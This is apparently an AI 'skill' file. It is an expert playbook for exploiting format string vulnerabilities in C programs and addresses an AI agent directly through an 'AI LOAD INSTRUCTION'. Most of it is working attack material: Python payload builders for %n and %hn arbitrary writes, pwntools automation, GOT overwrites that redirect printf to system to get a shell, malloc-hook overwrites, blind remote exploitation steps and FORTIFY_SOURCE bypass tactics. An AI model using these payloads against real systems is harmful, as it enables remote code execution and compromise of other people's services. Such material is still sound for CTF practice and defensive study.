format-string-exploitation

SKILL: Format String Exploitation — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget that on 64-bit targets the addresses must be placed after the format specifiers.

0. RELATED ROUTING

  • stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
  • binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
  • arbitrary-write-to-rce — convert format string write primitive to code execution targets
  • heap-exploitation — heap address leak via format string for heap exploitation

1. VULNERABILITY IDENTIFICATION

Vulnerable Pattern

```c
printf(user_input);            // VULNERABLE: user controls format string
fprintf(fp, user_input);       // VULNERABLE
sprintf(buf, user_input);      // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);      // SAFE: format string is fixed
```

Quick Test

Input: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset (0x41414141 when sending AAAA to a 32-bit target)

2. READING MEMORY

Stack Leak (%p)

| Format | Action | Use |
|---|---|---|
| `%p` | Print next stack value as pointer | Sequential stack dump |
| `%N$p` | Print N-th parameter as pointer | Direct positional access |
| `%N$lx` | Same as %p but explicit hex (64-bit) | Portable |
| `%N$s` | Dereference N-th parameter as string pointer | Read memory at pointer value |

Finding Your Input Offset

```python
# io: an already-connected pwntools tube (process() or remote())

# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0x1.0x4141414141414141...
# The marker comes back as the 6th value, so offset = 6 (example)

# Or automated (recvline() returns bytes; match the hex digits only, since a
# 64-bit slot also holds the bytes that follow AAAA):
for i in range(1, 30):
    io.sendline(f'AAAA%{i}$p'.encode())
    if b'41414141' in io.recvline():
        print(f'Offset = {i}')
        break
```
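
The manual counting step can also be done by parsing a single dump. The sketch below assumes the probe used dot separators as in the example above and that the target is little-endian; `find_input_offset` and the sample string are illustrative names and data, not part of any library.

```python
def find_input_offset(dump: str, marker: bytes = b"AAAAAAAA"):
    """Return the 1-based %p position whose value equals the marker, or None.

    `dump` is the text printed for a probe such as 'AAAAAAAA.%p.%p.%p...';
    the first dot-separated field is the echoed marker itself.
    """
    # For a run of identical bytes the byte order makes no difference,
    # but little-endian is what an x86 stack slot would show.
    want = int.from_bytes(marker, "little")
    fields = dump.strip().split(".")[1:]      # drop the echoed marker
    for position, field in enumerate(fields, start=1):
        if field == "(nil)":                  # glibc prints NULL as (nil)
            continue
        try:
            value = int(field, 16)
        except ValueError:                    # trailing garbage, prompts, etc.
            continue
        if value == want:
            return position
    return None


# Hypothetical dump, matching the shape of the example above
sample = "AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0x1.0x4141414141414141"
print(find_input_offset(sample))
```

Parsing one dump costs a single request, whereas the positional loop sends one request per candidate offset; the loop is still useful when the output is too short to hold many `%p` values.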

Leaking Specific Values

| Target | Method | Stack Position / Result |
|---|---|---|
| Canary | `%N$p` where N = canary offset from format string | Typically at input offset + buf_size/8 + a few slots; the value ends in 00 |
| Saved RBP | `%N$p` (the slot just before the return address) | Leaks a stack address → locate frames and buffers by fixed offset |
| Return address | `%N$p` | Leaks a .text address (PIE base = leak - offset of the return site in the binary; the result must be page-aligned) |
| Libc address | `%N$p` where N points to the `__libc_start_main+XX` return address on the stack (`__libc_start_call_main+XX` on glibc ≥ 2.34) | libc base = leak - offset |
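
The base calculations in the table are plain subtraction, and a page-alignment check catches most wrong offsets early. This is a minimal sketch; the leak values and offsets below are made-up numbers, and `base_from_leak` is an illustrative helper name.

```python
PAGE_MASK = 0xFFF


def base_from_leak(leak: int, offset_in_image: int) -> int:
    """Subtract the known offset of the leaked pointer inside its image."""
    base = leak - offset_in_image
    if base & PAGE_MASK:
        # Images are mapped on page boundaries, so a misaligned base means
        # the offset (or the assumed libc build) is wrong.
        raise ValueError(f"base {base:#x} is not page-aligned")
    return base


# Hypothetical leaks and offsets, for illustration only
ret_leak, ret_offset = 0x55D4C7A0128B, 0x128B       # return address into the binary
libc_leak, libc_offset = 0x7F3A1C229D90, 0x29D90    # return address into libc

pie_base = base_from_leak(ret_leak, ret_offset)
libc_base = base_from_leak(libc_leak, libc_offset)
print(hex(pie_base), hex(libc_base))
```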

Reading Arbitrary Address (%s)

```python
# 32-bit: place address at start of format string
payload = p32(target_addr) + b'%N$s'  # N = offset where target_addr appears on stack

# 64-bit: address contains null bytes → place AFTER format specifiers
# b'%8$sAAAA' is exactly 8 bytes (one stack slot), so the address lands one slot
# after the start of the input: input offset 7 → address at offset 8
payload = b'%8$sAAAA' + p64(target_addr)  # %8$s reads from offset 8 where address is
```
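
The 64-bit layout depends on the specifier part filling whole 8-byte slots, which is easy to get wrong by hand. The sketch below computes the slot index instead of hard-coding it; it uses only the standard library, assumes a little-endian 64-bit target, and `build_read_payload` is an illustrative name.

```python
def build_read_payload(input_offset: int, target_addr: int, word: int = 8) -> bytes:
    """Build '%K$s' + padding + packed address for a 64-bit target.

    input_offset: positional index at which the start of our input appears.
    The specifier part is padded to a whole number of words so that the
    address occupies exactly one stack slot, at index K.
    """
    slots = 1                                  # words used by the specifier part
    while True:
        spec = f"%{input_offset + slots}$s".encode()
        needed = -(-len(spec) // word)         # ceil(len / word)
        if needed == slots:
            break
        slots = needed
    # Padding bytes follow the specifier, so they are printed after the leak
    return spec.ljust(slots * word, b"A") + target_addr.to_bytes(word, "little")


# Hypothetical GOT address; input assumed to start at offset 6
print(build_read_payload(6, 0x601018))
```

`%s` stops at the first zero byte, so a leaked pointer usually comes back as 6 bytes and must be zero-extended before use.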

3. WRITING MEMORY (%n)

Write Specifiers

| Specifier | Bytes Written | Value Written |
|---|---|---|
| `%n` | 4 bytes (int) | Characters printed so far |
| `%hn` | 2 bytes (short) | Characters printed so far (mod 0x10000) |
| `%hhn` | 1 byte (char) | Characters printed so far (mod 0x100) |
| `%ln` | 8 bytes (long, on 64-bit Linux) | Characters printed so far |
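
The truncation in the table can be checked with a few lines of arithmetic. This sketch models only the stored value, assuming the x86-64 Linux type sizes listed above and little-endian storage; `stored_bytes` is an illustrative helper.

```python
WIDTHS = {"hhn": 1, "hn": 2, "n": 4, "ln": 8}   # bytes stored on x86-64 Linux


def stored_bytes(printed: int, spec: str) -> bytes:
    """Little-endian bytes that `spec` stores after `printed` characters."""
    width = WIDTHS[spec]
    return (printed % (1 << (8 * width))).to_bytes(width, "little")


for spec in ("hhn", "hn", "n", "ln"):
    print(f"%{spec} after 0x12345 chars stores {stored_bytes(0x12345, spec).hex()}")
```

Because the narrower specifiers wrap, a later write can target a smaller value than an earlier one by printing enough extra characters to overflow the counter.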

Arbitrary Write Technique

Goal: Write value `V` to address `A`.

**32-bit** (address on stack directly):
```python
# Write 2 bytes at a time using %hn
# Place target addresses in format string (they'll be on stack)
payload = p32(target_addr)        # for low 2 bytes
payload += p32(target_addr + 2)   # for high 2 bytes

# Calculate padding for each %hn write (8 address bytes are already printed)
low = value & 0xffff
high = (value >> 16) & 0xffff
pad_low = (low - 8) & 0xffff
pad_high = (high - low) & 0xffff
# omit %c when the padding is 0: '%0c' still prints one character
payload += (f'%{pad_low}c' if pad_low else '').encode() + f'%{offset}$hn'.encode()
payload += (f'%{pad_high}c' if pad_high else '').encode() + f'%{offset+1}$hn'.encode()
```

**64-bit** (address AFTER format string):
```python
# Addresses contain null bytes (0x00007fXXXXXXXXXX), which terminate the string
# Solution: place addresses AFTER the format specifiers

# Step 1: format string portion (no null bytes)
# X, Y = padding counts; N, M = offsets of the two appended addresses
fmt = b'%Xc%N$hn%Yc%M$hn'

# Step 2: pad to 8-byte alignment
align = (len(fmt) + 7) // 8 * 8   # then N = input offset + align // 8, M = N + 1
fmt = fmt.ljust(align, b'A')

# Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)
```
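
For the 32-bit case, the padding arithmetic is where most mistakes happen: the two halves must be written in ascending order of value, and a padding of zero must be dropped. The sketch below is one way to do that with the standard library only; it assumes the two packed addresses contain no null bytes or `%` characters, and `build_hn_payload_32` is an illustrative name.

```python
def build_hn_payload_32(offset: int, target_addr: int, value: int) -> bytes:
    """Two %hn writes of a 32-bit value; addresses sit at the start of the input.

    offset: positional index of the first 4 bytes of our input.
    """
    addrs = target_addr.to_bytes(4, "little") + (target_addr + 2).to_bytes(4, "little")
    halves = [(value & 0xFFFF, offset), ((value >> 16) & 0xFFFF, offset + 1)]
    halves.sort()                      # smaller count first keeps the padding short
    printed = len(addrs)               # the 8 address bytes are printed before any %c
    out = addrs
    for want, index in halves:
        pad = (want - printed) & 0xFFFF
        if pad:                        # '%0c' would still emit one character
            out += f"%{pad}c".encode()
        out += f"%{index}$hn".encode()
        printed += pad
    return out


# Hypothetical GOT slot and function address, input at offset 4
print(build_hn_payload_32(4, 0x0804A00C, 0xF7E12345))
```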

Byte-by-Byte Write with %hhn

Write one byte at a time for precision (6 writes for a full 48-bit address on 64-bit):
```python
from pwn import fmtstr_payload

writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    # store raw bytes: an int value would be packed to the full word size
    writes[target_addr + i] = bytes([byte_val])

# pwntools handles the math:
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
```
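
To see what "the math" amounts to for `%hhn`, the sketch below computes the extra characters needed before each one-byte write when the bytes are written in address order. It is a simplified model, not how pwntools orders its writes; `hhn_schedule` and the sample value are illustrative.

```python
def hhn_schedule(value: int, nbytes: int = 6, already_printed: int = 0):
    """Return [(byte_index, pad)] for one-byte writes in address order.

    pad is the number of extra characters to print (via %<pad>c) before the
    %hhn that targets target_addr + byte_index. A pad of 0 means no %c at all.
    """
    printed = already_printed
    plan = []
    for i in range(nbytes):
        want = (value >> (8 * i)) & 0xFF
        pad = (want - printed) % 0x100     # the counter wraps modulo 256
        plan.append((i, pad))
        printed += pad
    return plan


# Hypothetical 48-bit address to write
for index, pad in hhn_schedule(0x7F3A1C250D70):
    print(f"byte {index}: print {pad} more characters, then %hhn")
```

Since each write only needs the counter modulo 256, no padding ever exceeds 255 characters, which keeps the total output small compared with `%hn` or `%n`.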

4. PWNTOOLS fmtstr_payload()

```python
from pwn import *

# Set context.arch (or context.binary = elf) first so address sizes match the target.
# libc.address must already hold the leaked libc base.

# Overwrite GOT entry with target address
payload = fmtstr_payload(
    offset,                                       # stack offset where input appears
    {elf.got['printf']: libc.symbols['system']},  # {addr: value}
    numbwritten=0,                                # bytes already output before our input
    write_size='short'                            # 'byte', 'short', or 'int'
)

# For 64-bit with addresses after format string:
# fmtstr_payload handles this automatically
```

FmtStr Class (Interactive Exploitation)

```python
from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)
# fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
```

5. GOT OVERWRITE VIA FORMAT STRING

Common Targets

| Overwrite | With | Trigger |
|---|---|---|
| `printf@GOT` | `system` | Next `printf(user_input)` becomes `system(user_input)`; send `/bin/sh` |
| `strlen@GOT` | `system` | If `strlen(user_input)` is called |
| `puts@GOT` | `system` | If `puts(user_input)` is called |
| `atoi@GOT` | `system` | If `atoi(user_input)` is called (send `sh` as the "number") |
| `__stack_chk_fail@GOT` | Controlled addr | A failed canary check then jumps to the controlled address instead of aborting |
| `exit@GOT` | `main` | Each `exit()` re-enters `main`, creating a loop for a multi-shot exploit |

Hook Targets (glibc < 2.34)

| Target | Overwrite With | Trigger |
|---|---|---|
| `__malloc_hook` | one_gadget addr | Any `printf` with a large field width (e.g. `%100000c`) → internal `malloc` |
| `__free_hook` | `system` | `free()` of a chunk whose contents start with `/bin/sh` |

6. STACK POINTER CHAIN EXPLOITATION

When the format string is not on the stack (e.g., it is stored in a heap buffer referenced by a stack pointer), addresses placed in the input are not reachable as positional arguments. Use pointer chains that already exist on the stack to achieve an arbitrary write.

Two-Stage Write

Stack:
  [offset A] → ptr_X (stack address that points at the slot at offset B)
  [offset B] → ptr_Y (another pointer; this is the value ptr_X points to)

Stage 1: Use %A$hn to write through ptr_X → overwrites the low 2 bytes of ptr_Y, so ptr_Y now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_Y → writes to target_addr

This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp). Send the two stages as separate printf calls: with positional arguments glibc reads all argument values before performing any write, so a pointer modified in stage 1 is not seen by a %B$n in the same call. Because %hn changes only the low 2 bytes, target_addr is normally another stack address, such as a saved return address.
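
The two stages are easier to follow on a toy model. The sketch below simulates memory with a dict and models `%K$hn` as "store a 16-bit count at the address held in slot K"; all addresses are invented, and nothing here talks to a real process.

```python
class Memory:
    """Toy byte-addressable memory backed by a dict (unset bytes read as 0)."""

    def __init__(self):
        self.cells = {}

    def write(self, addr: int, data: bytes) -> None:
        for i, b in enumerate(data):
            self.cells[addr + i] = b

    def read_u64(self, addr: int) -> int:
        raw = bytes(self.cells.get(addr + i, 0) for i in range(8))
        return int.from_bytes(raw, "little")


def percent_hn(mem: Memory, slot_addr: int, count: int) -> None:
    """Model %K$hn: store count (mod 2**16) at the address held in the slot."""
    pointer = mem.read_u64(slot_addr)
    mem.write(pointer, (count & 0xFFFF).to_bytes(2, "little"))


mem = Memory()
SLOT_A, SLOT_B = 0x7FFD10000010, 0x7FFD10000040   # hypothetical stack slots
TARGET = 0x7FFD10000058                           # e.g. a saved return address
mem.write(SLOT_A, SLOT_B.to_bytes(8, "little"))           # slot A points at slot B
mem.write(SLOT_B, (0x7FFD10000090).to_bytes(8, "little")) # slot B holds a stack pointer

percent_hn(mem, SLOT_A, TARGET & 0xFFFF)   # stage 1: retarget the pointer in slot B
percent_hn(mem, SLOT_B, 0x1337)            # stage 2: write through slot B

print(hex(mem.read_u64(SLOT_B)), hex(mem.read_u64(TARGET)))
```

Note that stage 1 never changes slot A itself; it changes what slot A points at, which is the pointer stored in slot B.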

Finding Pointer Chains

```python
# Leak stack with %p, look for:
# 1. Offset N holding a stack address A that is the address of another stack slot
# 2. That slot, at offset M, holding a pointer B
# Write through A (using %N$hn) to change where B points
# Then write through B (using %M$hn) to target
```

7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.

Methodology

| Step | Action | Purpose |
|---|---|---|
| 1 | Send `%p` × 50 | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs (0x55.../0x56... with PIE, 0x40... without) |
| 3 | Find input offset | Send `AAAA%N$p` for N=1..50, find 41414141 in the value |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | If binary base known, read GOT via `%N$s` with GOT address (the same read primitive can dump the ELF from its base to locate the GOT) |
| 6 | Calculate libc base | GOT value - libc symbol offset |
| 7 | Overwrite GOT | `%n` to rewrite GOT entry with system address |
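
Steps 2 and 5 can be partly automated. The sketch below sorts leaked values into rough categories using address ranges that are typical for x86-64 Linux, and zero-extends a `%s` leak back into a pointer. The ranges are heuristics and an assumption of this example, not guarantees; both function names are illustrative.

```python
def classify_pointer(value: int) -> str:
    """Rough guess at what a leaked value is, using typical x86-64 Linux ranges."""
    if value < 0x10000:
        return "small integer"
    if 0x400000 <= value < 0x10000000:
        return "non-PIE binary"
    top = value >> 40                     # top byte of a 48-bit address
    if top in (0x55, 0x56):
        return "PIE binary or heap"
    if top == 0x7F:
        # the stack usually sits at the very top of the user address range
        return "stack" if (value >> 36) >= 0x7FF else "libc / mmap"
    return "unknown"


def pointer_from_s_leak(raw: bytes) -> int:
    """Turn the bytes printed by %s at a GOT slot back into an address."""
    # %s stops at the first zero byte, so only the low 6 bytes usually arrive
    return int.from_bytes(raw[:8].ljust(8, b"\x00"), "little")


for leak in (0x7FFD12340000, 0x7F1234567890, 0x55D4C7A0128B, 0x401136):
    print(hex(leak), classify_pointer(leak))
```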

8. FORTIFY_SOURCE BYPASS

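`FORTIFY_SOURCE` (gcc `-D_FORTIFY_SOURCE=2`) replaces `printf` with `__printf_chk`, which restricts positional arguments: `%N$` specifiers may not skip arguments, so an isolated `%N$n` (positional write) is rejected. glibc additionally aborts on any `%n` when the format string lives in writable memory, which covers attacker-supplied input.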

Bypass Techniques

| Method | Detail |
|---|---|
| Use `%hn` sequentially (no positional) | Print exact byte count, `%hn`, adjust, `%hn`; fragile, and it only avoids the positional check, so it works only where the writable-format `%n` check does not apply |
| Stack-based exploit | If format string is on stack, use non-positional `%n` with stack position control (same caveat as above) |
| Heap overflow instead | The printf checks do not stop heap corruption; combine with a heap bug |
| Return-to-printf | ROP to call unfortified `printf` (if available in binary or libc) |

9. 64-BIT CONSIDERATIONS

| Challenge | Solution |
|---|---|
| Addresses contain `\x00` (null byte terminates format string) | Place addresses AFTER format specifiers, pad to alignment |
| Address width: 6 significant bytes | Write 3 × `%hn` (2 bytes each) or 6 × `%hhn` |
| Larger stack offset range | Input is at offset 6 or higher: the first five variadic arguments come from registers (rsi, rdx, rcx, r8, r9), so stack slots start at offset 6 |
| 48-bit address space | Only bottom 48 bits of 64-bit used |

Layout Template (64-bit)

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →

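
The layout template has a circular dependency: the positional index of each address depends on how long the specifier part is, and that length depends on the digits of the indices. The sketch below resolves it by iterating until the length is stable. It uses only the standard library, assumes a little-endian 64-bit target, and `build_hn_payload_64` is an illustrative name rather than a pwntools function.

```python
def build_hn_payload_64(offset: int, target_addr: int, value: int, chunks: int = 3) -> bytes:
    """%hn writes for the low chunks*16 bits of value; addresses go last."""
    # (wanted 16-bit value, chunk index), smallest value first
    parts = sorted(((value >> (16 * i)) & 0xFFFF, i) for i in range(chunks))
    fmt_words = 1
    while True:
        first_addr_index = offset + fmt_words   # slot of the first appended address
        fmt, printed = b"", 0
        for rank, (want, _) in enumerate(parts):
            pad = (want - printed) & 0xFFFF
            if pad:                              # '%0c' would still emit one character
                fmt += f"%{pad}c".encode()
            fmt += f"%{first_addr_index + rank}$hn".encode()
            printed += pad
        needed = -(-len(fmt) // 8)               # ceil(len / 8)
        if needed <= fmt_words:
            break
        fmt_words = needed
    # Padding comes after the last %hn, so it does not disturb the counts
    fmt = fmt.ljust(fmt_words * 8, b"A")
    addrs = b"".join((target_addr + 2 * i).to_bytes(8, "little") for _, i in parts)
    return fmt + addrs


# Hypothetical GOT slot and libc address, input at offset 6
payload = build_hn_payload_64(6, 0x404018, 0x7F3A1C250D70)
print(payload)
```

The addresses are appended in the same sorted order as the writes, so the k-th `%hn` always refers to the k-th appended address.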

10. DECISION TREE

Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → %n in a writable format string aborts; %N$ may not skip arguments
│   │   ├── Leak only? → sequential %p%p%p... still works
│   │   └── Write needed? → combine with another primitive (heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, __exit_funcs, tls_dtor_list
│   └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes